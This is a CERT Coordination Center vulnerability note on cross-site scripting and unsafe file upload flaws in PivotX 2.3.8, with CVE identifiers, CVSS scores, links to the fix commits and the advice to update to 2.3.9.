search menu icon-carat-right cmu-wordmark

CERT Coordination Center

PivotX 2.3.8 contains multiple vulnerabilities

Vulnerability Note VU#901156

Original Release Date: 2014-04-11 | Last Revised: 2014-07-24

Overview

PivotX 2.3.8, and possibly earlier versions, contains cross-site scripting (CWE-79) and unsafe file upload (CWE-434) vulnerabilities.

Description

PivotX 2.3.8, and possibly earlier versions, contains cross-site scripting (CWE-79) and unsafe file upload (CWE-434) vulnerabilities.

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2014-0341
PivotX overview screens were susceptible to cross-site scripting attacks. The following code commits provide the details.
http://sourceforge.net/p/pivot-weblog/code/4349/
http://sourceforge.net/p/pivot-weblog/code/4345/

CWE-434: Unrestricted Upload of File with Dangerous Type - CVE-2014-0342
The file upload check did not include the file extension. The following code commit provides the details.
http://sourceforge.net/p/pivot-weblog/code/4347/

The CVSS score below is for CVE-2014-0342.

Impact

A remote authenticated attacker may be able to inject arbitrary script into a web page or upload a malicious file.

Solution

Apply an Update

PivotX 2.3.9 has been released to address these vulnerabilities.

Vendor Information

901156
 
Affected   Unknown   Unaffected

PivotX

Updated:  April 11, 2014

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.


CVSS Metrics

Group Score Vector
Base 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Temporal 5.1 E:POC/RL:OF/RC:C
Environmental 1.3 CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

References

Acknowledgements

Thanks to Diego Garc໚ for reporting these vulnerabilities.

This document was written by Jared Allar.

Other Information

CVE IDs: CVE-2014-0341, CVE-2014-0342
Date Public: 2014-03-05
Date First Published: 2014-04-11
Date Last Updated: 2014-07-24 21:10 UTC
Document Revision: 7

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.